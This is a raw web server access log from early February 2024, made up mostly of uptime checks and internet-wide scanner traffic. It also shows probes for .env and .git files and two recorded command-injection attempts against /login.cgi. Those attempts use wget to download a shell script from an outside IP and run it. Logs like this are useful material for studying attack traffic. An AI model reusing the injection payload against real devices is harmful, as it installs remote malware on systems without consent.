141.98.11.201 - - [01/Feb/2024:23:23:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Feb/2024:23:23:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:24:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.201 - - [01/Feb/2024:23:24:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Feb/2024:23:25:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.71 - - [01/Feb/2024:23:26:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Feb/2024:23:26:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.103.251.153 - - [01/Feb/2024:23:26:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Feb/2024:23:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:28:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:29:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [01/Feb/2024:23:29:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Feb/2024:23:30:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.201 - - [01/Feb/2024:23:30:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Feb/2024:23:31:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:32:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:33:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:34:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:35:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:36:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.235 - - [01/Feb/2024:23:36:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Feb/2024:23:37:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.129.232.53 - - [01/Feb/2024:23:37:54 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/51.0"
212.91.246.72 - - [01/Feb/2024:23:38:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:39:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:40:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:41:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [01/Feb/2024:23:41:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Feb/2024:23:42:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.129.232.53 - - [01/Feb/2024:23:43:04 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/51.0"
212.91.246.72 - - [01/Feb/2024:23:43:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.219.11.155 - - [01/Feb/2024:23:43:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Feb/2024:23:44:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:45:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:47:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:48:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:49:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:50:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:51:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.201 - - [01/Feb/2024:23:51:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Feb/2024:23:52:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.235 - - [01/Feb/2024:23:52:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
141.98.11.201 - - [01/Feb/2024:23:52:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.146.62.139 - - [01/Feb/2024:23:52:50 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.91.223.136/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Feb/2024:23:53:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:54:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2024:23:55:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.235 - - [01/Feb/2024:23:55:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Feb/2024:23:56:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.231 - - [01/Feb/2024:23:56:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Feb/2024:23:57:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.10.184.203 - - [01/Feb/2024:23:57:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
141.98.11.201 - - [01/Feb/2024:23:58:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Feb/2024:23:58:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.201 - - [01/Feb/2024:23:58:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Feb/2024:23:59:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.7.179 - - [02/Feb/2024:00:00:44 +0100] "GET http://141.98.7.179/a.php?pro=212.91.246.88:80 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36"
156.146.62.139 - - [02/Feb/2024:00:02:47 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.91.223.136/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
176.97.210.231 - - [02/Feb/2024:00:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
173.201.29.39 - - [02/Feb/2024:00:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.20.0"
176.97.210.231 - - [02/Feb/2024:00:10:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.97.210.231 - - [02/Feb/2024:00:11:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.182.230.69 - - [02/Feb/2024:00:19:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.203.211.26 - - [02/Feb/2024:00:23:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
49.51.160.161 - - [02/Feb/2024:00:28:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
185.166.84.146 - - [02/Feb/2024:00:29:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
185.166.84.146 - - [02/Feb/2024:00:29:10 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
61.219.11.155 - - [02/Feb/2024:00:36:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.97.210.231 - - [02/Feb/2024:00:45:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
89.248.168.37 - - [02/Feb/2024:00:50:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
3.8.117.21 - - [02/Feb/2024:00:52:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.180.174.96 - - [02/Feb/2024:00:54:18 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-G900A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
3.8.117.21 - - [02/Feb/2024:00:56:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.245 - - [02/Feb/2024:00:56:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.172.21 - - [02/Feb/2024:00:58:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.117.21 - - [02/Feb/2024:00:58:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:00:59:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:02:08 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:03:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:01:03:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
54.226.55.202 - - [02/Feb/2024:01:04:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/54.0.3077.67 Safari/537.32"
79.133.57.24 - - [02/Feb/2024:01:05:47 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
3.8.117.21 - - [02/Feb/2024:01:06:04 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:07:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:01:08:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [02/Feb/2024:01:08:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:09:46 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:11:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:13:35 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:15:02 +0100] "\x16\x03\x01" 501 318 "-" "-"
216.247.133.166 - - [02/Feb/2024:01:15:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.180.143.137 - - [02/Feb/2024:01:15:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.137 - - [02/Feb/2024:01:16:00 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
146.19.24.23 - - [02/Feb/2024:01:16:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:17:26 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:18:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.97.210.231 - - [02/Feb/2024:01:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:21:08 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:22:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
102.129.232.53 - - [02/Feb/2024:01:22:38 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/51.0"
146.19.24.23 - - [02/Feb/2024:01:23:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.56 - - [02/Feb/2024:01:23:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.56 - - [02/Feb/2024:01:23:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [02/Feb/2024:01:23:40 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.56 - - [02/Feb/2024:01:23:41 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
3.8.117.21 - - [02/Feb/2024:01:24:52 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:26:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:01:26:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:28:34 +0100] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.117.21 - - [02/Feb/2024:01:30:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:01:32:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.8.117.21 - - [02/Feb/2024:01:32:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
198.235.24.215 - - [02/Feb/2024:01:41:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.181.223 - - [02/Feb/2024:01:41:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
149.129.50.37 - - [02/Feb/2024:01:45:18 +0100] "GET http://www.1ucn.com/proxychecker/index.php HTTP/1.1" 404 326 "-" "Mozilla/3.0 (WorldGate Gazelle 3.5.1 build 11; FreeBSD2.2.8-STABLE)"
205.210.31.111 - - [02/Feb/2024:01:45:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
134.209.34.15 - - [02/Feb/2024:01:46:13 +0100] "GET //verification.html HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0"
51.159.111.112 - - [02/Feb/2024:01:47:50 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.111.112 - - [02/Feb/2024:01:47:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
51.159.111.112 - - [02/Feb/2024:01:47:52 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
185.230.174.111 - - [02/Feb/2024:01:53:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
43.155.166.202 - - [02/Feb/2024:01:57:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
5.196.102.66 - - [02/Feb/2024:02:00:01 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
80.66.88.215 - - [02/Feb/2024:02:07:32 +0100] "\x03" 501 316 "-" "-"
35.203.211.101 - - [02/Feb/2024:02:09:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.150.50 - - [02/Feb/2024:02:11:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.180.143.137 - - [02/Feb/2024:02:16:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.137 - - [02/Feb/2024:02:16:40 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.165.16.76 - - [02/Feb/2024:02:17:58 +0100] "\x03" 501 316 "-" "-"
185.180.143.6 - - [02/Feb/2024:02:23:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
87.236.176.91 - - [02/Feb/2024:02:27:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
162.216.149.47 - - [02/Feb/2024:02:35:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
78.153.140.224 - - [02/Feb/2024:02:35:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.224 - - [02/Feb/2024:02:35:42 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:36:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:37:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:37:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:37:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
198.235.24.171 - - [02/Feb/2024:02:37:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
94.102.61.10 - - [02/Feb/2024:02:38:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:39:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:40:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:41:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Feb/2024:02:41:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.180.143.6 - - [02/Feb/2024:02:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
146.19.24.23 - - [02/Feb/2024:02:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
217.119.126.166 - - [02/Feb/2024:02:52:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
202.52.58.254 - - [02/Feb/2024:02:56:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
146.19.24.23 - - [02/Feb/2024:02:58:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.248 - - [02/Feb/2024:02:59:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.248 - - [02/Feb/2024:02:59:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:03:09:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
192.241.225.74 - - [02/Feb/2024:03:16:10 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
